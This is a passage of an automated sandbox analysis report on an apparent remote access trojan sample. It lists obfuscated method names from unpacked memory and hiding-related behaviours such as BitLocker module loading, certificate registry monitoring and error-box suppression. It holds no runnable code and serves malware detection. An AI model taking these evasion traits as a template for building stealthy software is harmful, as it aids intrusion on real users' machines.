            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeCode function: 4_2_05641BE8 push eax; retf 4_2_05641BE9
            Source: SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeStatic PE information: section name: .text entropy: 7.977489549607041
            Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe.6780000.7.raw.unpack, Ak4oG7NYOwJL1B3Iuo.csHigh entropy of concatenated method names: 'Dispose', 'F0rhvYhSpS', 'BZKtaTFUoY', 'aBbCCwJkeg', 'gaih2xC1jV', 'KYjhzvxbsW', 'ProcessDialogKey', 'jPEteJWMNK', 'O0xthrh3OH', 'FcFttJXbhu'
            Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe.6780000.7.raw.unpack, Pwpj4xKLD3kV8kZye0j.csHigh entropy of concatenated method names: 'wPEWE6SbMT', 'uslWkxkB0r', 'hSrWSOUoa6', 'n4RW0nGPLj', 'vEUWbygdqZ', 'JSbWNHoIBn', 'Vy6WG9wceE', 'iHNWFShdT1', 'B9GW7ktRSW', 'BhZWT5TsKe'
            Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe.6780000.7.raw.unpack, QQKot902G4vU2soPiv.csHigh entropy of concatenated method names: 'Y9swFsy4uZ', 'WDWw73mMZv', 'oq4wyHojME', 'FL5wahq1uZ', 'nUwwqJfBR9', 'hkywr3sQQX', 'Maow59y7b6', 'JpAwVEjvUK', 'yGaw6emi4y', 'AdywAVICE5'
            Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe.6780000.7.raw.unpack, fVqBTE5GN24nXcJ2Na.csHigh entropy of concatenated method names: 'xmASv280U', 'Go40xB6Eh', 'EatNV6xUT', 'P2eGCEIcM', 'V9u79rU6F', 'r4KTM83qT', 'FgTiQiV2Ra2jAuMHGR', 'wDlSUsfffMW8lcUk99', 'O89xwP1pt', 'ahagBfkN3'
            Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe.6780000.7.raw.unpack, lXmeKmPdTaDsuhOP4M.csHigh entropy of concatenated method names: 'SwnYDvtalp', 'NIEYItfRNB', 'OUcYf5LTs7', 'GcCYO0Ll1i', 'u1PYnyDgOU', 'fyAYMbGDj5', 'XUNYUuS1iB', 'gnLYujx09I', 'EqkY3HZssa', 'YCpYP4PLt2'
            Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe.6780000.7.raw.unpack, LKGBl8HqPCBQXSKmTW.csHigh entropy of concatenated method names: 'FLC84FNOEw', 'iTJ82C93XZ', 'Ac8xeevVgg', 'cJVxh6qQvh', 'oRi8A1xxHV', 'mNw8KivQDA', 'zfn8Hgr5oo', 'XFJ8ixbuFp', 'uOf8X1vZxd', 'tBy8ZwbirW'
            Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe.6780000.7.raw.unpack, Q534henmWuNmoyahwo.csHigh entropy of concatenated method names: 'pufj6qFkDU', 'lZwjKEp5ug', 'CGUjiJO4yv', 'hNhjX6kGuL', 'wSCjavQyKK', 'IA9jJF0BT2', 'pshjqDZbdN', 'BjGjrU7E6Q', 'Px9jsrivpa', 'f1Lj534ylg'
            Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe.6780000.7.raw.unpack, bbPsGWxoYJLfpZBGIC.csHigh entropy of concatenated method names: 'm3fhUgYigO', 'btrhuvIqGx', 'mblhPuJtfn', 'giEhR2mI9O', 'A9XhjvrGJj', 'bljhouHeJQ', 'qFingUkohEIInRpeg4', 'WFTHoj6j8DU2oagbWC', 'sDlhhA2ptG', 'WxphY5Hl8L'
            Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe.6780000.7.raw.unpack, YGEM2bi6LyVcTr1Cyx.csHigh entropy of concatenated method names: 'oI4UIZ19Pk', 'TLUUOhxHAD', 'wFKUMpAEgc', 'ymHM2bSSI7', 'YRpMzowZSw', 'OMSUe9f5pW', 'YwcUhMEyrw', 'CtIUtlwO7T', 'rjRUYP2gLQ', 'Ei1Udf8VUY'
            Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe.6780000.7.raw.unpack, Se7yaxeobBMdUHx8Vi.csHigh entropy of concatenated method names: 'xlsfiruKIW', 'otofXgSOfo', 'MSefZjtCdT', 'l5VfcUHHVe', 'KqrfQHKqxe', 'vckfLKfQdl', 'h9rfmefTR8', 'ABVf4ofSFW', 'EIgfvXKmnO', 'xISf2C0jWG'
            Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe.6780000.7.raw.unpack, kdj6WvMI01nxVHVla4.csHigh entropy of concatenated method names: 'CaKO0Wpvww', 'G3iONL7mng', 'FhDOF2hJFU', 'kedO7DK5YY', 'VZZOji9Axe', 'uKOOo2T4nq', 'gETO8YeqCV', 'HYtOxjopyH', 'iq3OWTLGeg', 'pCKOgrlCLk'
            Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe.6780000.7.raw.unpack, zXnonSyflm4XEq4w2O.csHigh entropy of concatenated method names: 'dGPUEpH5oP', 'cGCUkL7MB2', 'pQjUSkQNcC', 'PdWU0vhcPd', 'WtXUbcogrh', 'gjDUNPRFBX', 'i46UGKe2i6', 'ckoUFUKZy4', 'vUgU7h5cbo', 'UGpUTkjotR'
            Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe.6780000.7.raw.unpack, EH2RCFfeaNraoXmPh4.csHigh entropy of concatenated method names: 'WXJxyC4fCR', 'DKdxaMmPhp', 'CY8xJYd0Hy', 'oJXxq0j0Ul', 'd5UxigqD5R', 'irWxrwtYeK', 'Next', 'Next', 'Next', 'NextBytes'
            Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe.6780000.7.raw.unpack, SWsSDUtWUdrnebBMgx.csHigh entropy of concatenated method names: 'lD3Whn0Z1F', 'aspWYDoNO2', 'GX0WduC6Ll', 'IiNWIKeBNx', 'FHfWfv6pcS', 'VPUWn9Q7Pk', 'ahTWMAbqTB', 's4nxmcUmE8', 'YJIx4w0xnH', 'UwOxvS9TaP'
            Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe.6780000.7.raw.unpack, VAFL6yzLyY66jhx7II.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'sGkWwZ9arc', 'G1YWjmyMK8', 'kKAWo1IBMc', 'cvMW8wpQR6', 'VJYWxyr4NC', 'sqEWWMu0HG', 'v41Wg8bRgB'
            Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe.6780000.7.raw.unpack, GCbAElUGA7WyejW7Zv.csHigh entropy of concatenated method names: 'JafxIOnthq', 'JINxffbKro', 'KAuxOylFs1', 'uxWxnLC7WT', 'knbxM2iXXI', 'ha3xUls2WJ', 'XP0xu6VMLr', 'bxbx3SFssf', 'IejxP2pdKP', 'JFAxRIYVxq'
            Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe.6780000.7.raw.unpack, KsKTQfhbw7oCRIK4yb.csHigh entropy of concatenated method names: 'ioT8PxqKy7', 'LVf8RWoy9H', 'ToString', 'wk48I9gA0l', 'Tpq8f9eKLb', 'T6g8O1oplt', 'ygL8neeNHs', 'UXv8MsyTtu', 'Yuc8UtPYoa', 'hyD8uKIIdk'
            Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe.6780000.7.raw.unpack, OrhtwbropZ5iQ0Knjf.csHigh entropy of concatenated method names: 'CAZMDJm2RU', 'pspMfoEE2O', 'x4LMnQS8in', 'gKKMU4ga3E', 'jHPMuRRmig', 'U06nQrojBJ', 'XEqnLBEXa3', 'Lrwnm8Mc8Q', 'E29n46N3U4', 'SXtnvTiVGP'
            Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe.39b61d0.3.raw.unpack, Ak4oG7NYOwJL1B3Iuo.csHigh entropy of concatenated method names: 'Dispose', 'F0rhvYhSpS', 'BZKtaTFUoY', 'aBbCCwJkeg', 'gaih2xC1jV', 'KYjhzvxbsW', 'ProcessDialogKey', 'jPEteJWMNK', 'O0xthrh3OH', 'FcFttJXbhu'
            Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe.39b61d0.3.raw.unpack, Pwpj4xKLD3kV8kZye0j.csHigh entropy of concatenated method names: 'wPEWE6SbMT', 'uslWkxkB0r', 'hSrWSOUoa6', 'n4RW0nGPLj', 'vEUWbygdqZ', 'JSbWNHoIBn', 'Vy6WG9wceE', 'iHNWFShdT1', 'B9GW7ktRSW', 'BhZWT5TsKe'
            Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe.39b61d0.3.raw.unpack, QQKot902G4vU2soPiv.csHigh entropy of concatenated method names: 'Y9swFsy4uZ', 'WDWw73mMZv', 'oq4wyHojME', 'FL5wahq1uZ', 'nUwwqJfBR9', 'hkywr3sQQX', 'Maow59y7b6', 'JpAwVEjvUK', 'yGaw6emi4y', 'AdywAVICE5'
            Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe.39b61d0.3.raw.unpack, fVqBTE5GN24nXcJ2Na.csHigh entropy of concatenated method names: 'xmASv280U', 'Go40xB6Eh', 'EatNV6xUT', 'P2eGCEIcM', 'V9u79rU6F', 'r4KTM83qT', 'FgTiQiV2Ra2jAuMHGR', 'wDlSUsfffMW8lcUk99', 'O89xwP1pt', 'ahagBfkN3'
            Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe.39b61d0.3.raw.unpack, lXmeKmPdTaDsuhOP4M.csHigh entropy of concatenated method names: 'SwnYDvtalp', 'NIEYItfRNB', 'OUcYf5LTs7', 'GcCYO0Ll1i', 'u1PYnyDgOU', 'fyAYMbGDj5', 'XUNYUuS1iB', 'gnLYujx09I', 'EqkY3HZssa', 'YCpYP4PLt2'
            Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe.39b61d0.3.raw.unpack, LKGBl8HqPCBQXSKmTW.csHigh entropy of concatenated method names: 'FLC84FNOEw', 'iTJ82C93XZ', 'Ac8xeevVgg', 'cJVxh6qQvh', 'oRi8A1xxHV', 'mNw8KivQDA', 'zfn8Hgr5oo', 'XFJ8ixbuFp', 'uOf8X1vZxd', 'tBy8ZwbirW'
            Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe.39b61d0.3.raw.unpack, Q534henmWuNmoyahwo.csHigh entropy of concatenated method names: 'pufj6qFkDU', 'lZwjKEp5ug', 'CGUjiJO4yv', 'hNhjX6kGuL', 'wSCjavQyKK', 'IA9jJF0BT2', 'pshjqDZbdN', 'BjGjrU7E6Q', 'Px9jsrivpa', 'f1Lj534ylg'
            Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe.39b61d0.3.raw.unpack, bbPsGWxoYJLfpZBGIC.csHigh entropy of concatenated method names: 'm3fhUgYigO', 'btrhuvIqGx', 'mblhPuJtfn', 'giEhR2mI9O', 'A9XhjvrGJj', 'bljhouHeJQ', 'qFingUkohEIInRpeg4', 'WFTHoj6j8DU2oagbWC', 'sDlhhA2ptG', 'WxphY5Hl8L'
            Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe.39b61d0.3.raw.unpack, YGEM2bi6LyVcTr1Cyx.csHigh entropy of concatenated method names: 'oI4UIZ19Pk', 'TLUUOhxHAD', 'wFKUMpAEgc', 'ymHM2bSSI7', 'YRpMzowZSw', 'OMSUe9f5pW', 'YwcUhMEyrw', 'CtIUtlwO7T', 'rjRUYP2gLQ', 'Ei1Udf8VUY'
            Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe.39b61d0.3.raw.unpack, Se7yaxeobBMdUHx8Vi.csHigh entropy of concatenated method names: 'xlsfiruKIW', 'otofXgSOfo', 'MSefZjtCdT', 'l5VfcUHHVe', 'KqrfQHKqxe', 'vckfLKfQdl', 'h9rfmefTR8', 'ABVf4ofSFW', 'EIgfvXKmnO', 'xISf2C0jWG'
            Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe.39b61d0.3.raw.unpack, kdj6WvMI01nxVHVla4.csHigh entropy of concatenated method names: 'CaKO0Wpvww', 'G3iONL7mng', 'FhDOF2hJFU', 'kedO7DK5YY', 'VZZOji9Axe', 'uKOOo2T4nq', 'gETO8YeqCV', 'HYtOxjopyH', 'iq3OWTLGeg', 'pCKOgrlCLk'
            Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe.39b61d0.3.raw.unpack, zXnonSyflm4XEq4w2O.csHigh entropy of concatenated method names: 'dGPUEpH5oP', 'cGCUkL7MB2', 'pQjUSkQNcC', 'PdWU0vhcPd', 'WtXUbcogrh', 'gjDUNPRFBX', 'i46UGKe2i6', 'ckoUFUKZy4', 'vUgU7h5cbo', 'UGpUTkjotR'
            Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe.39b61d0.3.raw.unpack, EH2RCFfeaNraoXmPh4.csHigh entropy of concatenated method names: 'WXJxyC4fCR', 'DKdxaMmPhp', 'CY8xJYd0Hy', 'oJXxq0j0Ul', 'd5UxigqD5R', 'irWxrwtYeK', 'Next', 'Next', 'Next', 'NextBytes'
            Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe.39b61d0.3.raw.unpack, SWsSDUtWUdrnebBMgx.csHigh entropy of concatenated method names: 'lD3Whn0Z1F', 'aspWYDoNO2', 'GX0WduC6Ll', 'IiNWIKeBNx', 'FHfWfv6pcS', 'VPUWn9Q7Pk', 'ahTWMAbqTB', 's4nxmcUmE8', 'YJIx4w0xnH', 'UwOxvS9TaP'
            Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe.39b61d0.3.raw.unpack, VAFL6yzLyY66jhx7II.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'sGkWwZ9arc', 'G1YWjmyMK8', 'kKAWo1IBMc', 'cvMW8wpQR6', 'VJYWxyr4NC', 'sqEWWMu0HG', 'v41Wg8bRgB'
            Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe.39b61d0.3.raw.unpack, GCbAElUGA7WyejW7Zv.csHigh entropy of concatenated method names: 'JafxIOnthq', 'JINxffbKro', 'KAuxOylFs1', 'uxWxnLC7WT', 'knbxM2iXXI', 'ha3xUls2WJ', 'XP0xu6VMLr', 'bxbx3SFssf', 'IejxP2pdKP', 'JFAxRIYVxq'
            Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe.39b61d0.3.raw.unpack, KsKTQfhbw7oCRIK4yb.csHigh entropy of concatenated method names: 'ioT8PxqKy7', 'LVf8RWoy9H', 'ToString', 'wk48I9gA0l', 'Tpq8f9eKLb', 'T6g8O1oplt', 'ygL8neeNHs', 'UXv8MsyTtu', 'Yuc8UtPYoa', 'hyD8uKIIdk'
            Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe.39b61d0.3.raw.unpack, OrhtwbropZ5iQ0Knjf.csHigh entropy of concatenated method names: 'CAZMDJm2RU', 'pspMfoEE2O', 'x4LMnQS8in', 'gKKMU4ga3E', 'jHPMuRRmig', 'U06nQrojBJ', 'XEqnLBEXa3', 'Lrwnm8Mc8Q', 'E29n46N3U4', 'SXtnvTiVGP'
            Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe.3a17df0.1.raw.unpack, Ak4oG7NYOwJL1B3Iuo.csHigh entropy of concatenated method names: 'Dispose', 'F0rhvYhSpS', 'BZKtaTFUoY', 'aBbCCwJkeg', 'gaih2xC1jV', 'KYjhzvxbsW', 'ProcessDialogKey', 'jPEteJWMNK', 'O0xthrh3OH', 'FcFttJXbhu'
            Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe.3a17df0.1.raw.unpack, Pwpj4xKLD3kV8kZye0j.csHigh entropy of concatenated method names: 'wPEWE6SbMT', 'uslWkxkB0r', 'hSrWSOUoa6', 'n4RW0nGPLj', 'vEUWbygdqZ', 'JSbWNHoIBn', 'Vy6WG9wceE', 'iHNWFShdT1', 'B9GW7ktRSW', 'BhZWT5TsKe'
            Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe.3a17df0.1.raw.unpack, QQKot902G4vU2soPiv.csHigh entropy of concatenated method names: 'Y9swFsy4uZ', 'WDWw73mMZv', 'oq4wyHojME', 'FL5wahq1uZ', 'nUwwqJfBR9', 'hkywr3sQQX', 'Maow59y7b6', 'JpAwVEjvUK', 'yGaw6emi4y', 'AdywAVICE5'
            Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe.3a17df0.1.raw.unpack, fVqBTE5GN24nXcJ2Na.csHigh entropy of concatenated method names: 'xmASv280U', 'Go40xB6Eh', 'EatNV6xUT', 'P2eGCEIcM', 'V9u79rU6F', 'r4KTM83qT', 'FgTiQiV2Ra2jAuMHGR', 'wDlSUsfffMW8lcUk99', 'O89xwP1pt', 'ahagBfkN3'
            Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe.3a17df0.1.raw.unpack, lXmeKmPdTaDsuhOP4M.csHigh entropy of concatenated method names: 'SwnYDvtalp', 'NIEYItfRNB', 'OUcYf5LTs7', 'GcCYO0Ll1i', 'u1PYnyDgOU', 'fyAYMbGDj5', 'XUNYUuS1iB', 'gnLYujx09I', 'EqkY3HZssa', 'YCpYP4PLt2'
            Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe.3a17df0.1.raw.unpack, LKGBl8HqPCBQXSKmTW.csHigh entropy of concatenated method names: 'FLC84FNOEw', 'iTJ82C93XZ', 'Ac8xeevVgg', 'cJVxh6qQvh', 'oRi8A1xxHV', 'mNw8KivQDA', 'zfn8Hgr5oo', 'XFJ8ixbuFp', 'uOf8X1vZxd', 'tBy8ZwbirW'
            Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe.3a17df0.1.raw.unpack, Q534henmWuNmoyahwo.csHigh entropy of concatenated method names: 'pufj6qFkDU', 'lZwjKEp5ug', 'CGUjiJO4yv', 'hNhjX6kGuL', 'wSCjavQyKK', 'IA9jJF0BT2', 'pshjqDZbdN', 'BjGjrU7E6Q', 'Px9jsrivpa', 'f1Lj534ylg'
            Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe.3a17df0.1.raw.unpack, bbPsGWxoYJLfpZBGIC.csHigh entropy of concatenated method names: 'm3fhUgYigO', 'btrhuvIqGx', 'mblhPuJtfn', 'giEhR2mI9O', 'A9XhjvrGJj', 'bljhouHeJQ', 'qFingUkohEIInRpeg4', 'WFTHoj6j8DU2oagbWC', 'sDlhhA2ptG', 'WxphY5Hl8L'
            Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe.3a17df0.1.raw.unpack, YGEM2bi6LyVcTr1Cyx.csHigh entropy of concatenated method names: 'oI4UIZ19Pk', 'TLUUOhxHAD', 'wFKUMpAEgc', 'ymHM2bSSI7', 'YRpMzowZSw', 'OMSUe9f5pW', 'YwcUhMEyrw', 'CtIUtlwO7T', 'rjRUYP2gLQ', 'Ei1Udf8VUY'
            Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe.3a17df0.1.raw.unpack, Se7yaxeobBMdUHx8Vi.csHigh entropy of concatenated method names: 'xlsfiruKIW', 'otofXgSOfo', 'MSefZjtCdT', 'l5VfcUHHVe', 'KqrfQHKqxe', 'vckfLKfQdl', 'h9rfmefTR8', 'ABVf4ofSFW', 'EIgfvXKmnO', 'xISf2C0jWG'
            Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe.3a17df0.1.raw.unpack, kdj6WvMI01nxVHVla4.csHigh entropy of concatenated method names: 'CaKO0Wpvww', 'G3iONL7mng', 'FhDOF2hJFU', 'kedO7DK5YY', 'VZZOji9Axe', 'uKOOo2T4nq', 'gETO8YeqCV', 'HYtOxjopyH', 'iq3OWTLGeg', 'pCKOgrlCLk'
            Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe.3a17df0.1.raw.unpack, zXnonSyflm4XEq4w2O.csHigh entropy of concatenated method names: 'dGPUEpH5oP', 'cGCUkL7MB2', 'pQjUSkQNcC', 'PdWU0vhcPd', 'WtXUbcogrh', 'gjDUNPRFBX', 'i46UGKe2i6', 'ckoUFUKZy4', 'vUgU7h5cbo', 'UGpUTkjotR'
            Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe.3a17df0.1.raw.unpack, EH2RCFfeaNraoXmPh4.csHigh entropy of concatenated method names: 'WXJxyC4fCR', 'DKdxaMmPhp', 'CY8xJYd0Hy', 'oJXxq0j0Ul', 'd5UxigqD5R', 'irWxrwtYeK', 'Next', 'Next', 'Next', 'NextBytes'
            Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe.3a17df0.1.raw.unpack, SWsSDUtWUdrnebBMgx.csHigh entropy of concatenated method names: 'lD3Whn0Z1F', 'aspWYDoNO2', 'GX0WduC6Ll', 'IiNWIKeBNx', 'FHfWfv6pcS', 'VPUWn9Q7Pk', 'ahTWMAbqTB', 's4nxmcUmE8', 'YJIx4w0xnH', 'UwOxvS9TaP'
            Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe.3a17df0.1.raw.unpack, VAFL6yzLyY66jhx7II.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'sGkWwZ9arc', 'G1YWjmyMK8', 'kKAWo1IBMc', 'cvMW8wpQR6', 'VJYWxyr4NC', 'sqEWWMu0HG', 'v41Wg8bRgB'
            Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe.3a17df0.1.raw.unpack, GCbAElUGA7WyejW7Zv.csHigh entropy of concatenated method names: 'JafxIOnthq', 'JINxffbKro', 'KAuxOylFs1', 'uxWxnLC7WT', 'knbxM2iXXI', 'ha3xUls2WJ', 'XP0xu6VMLr', 'bxbx3SFssf', 'IejxP2pdKP', 'JFAxRIYVxq'
            Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe.3a17df0.1.raw.unpack, KsKTQfhbw7oCRIK4yb.csHigh entropy of concatenated method names: 'ioT8PxqKy7', 'LVf8RWoy9H', 'ToString', 'wk48I9gA0l', 'Tpq8f9eKLb', 'T6g8O1oplt', 'ygL8neeNHs', 'UXv8MsyTtu', 'Yuc8UtPYoa', 'hyD8uKIIdk'
            Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe.3a17df0.1.raw.unpack, OrhtwbropZ5iQ0Knjf.csHigh entropy of concatenated method names: 'CAZMDJm2RU', 'pspMfoEE2O', 'x4LMnQS8in', 'gKKMU4ga3E', 'jHPMuRRmig', 'U06nQrojBJ', 'XEqnLBEXa3', 'Lrwnm8Mc8Q', 'E29n46N3U4', 'SXtnvTiVGP'

            Hooking and other Techniques for Hiding and Protection

            barindex
            Loading BitLocker PowerShell Module
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
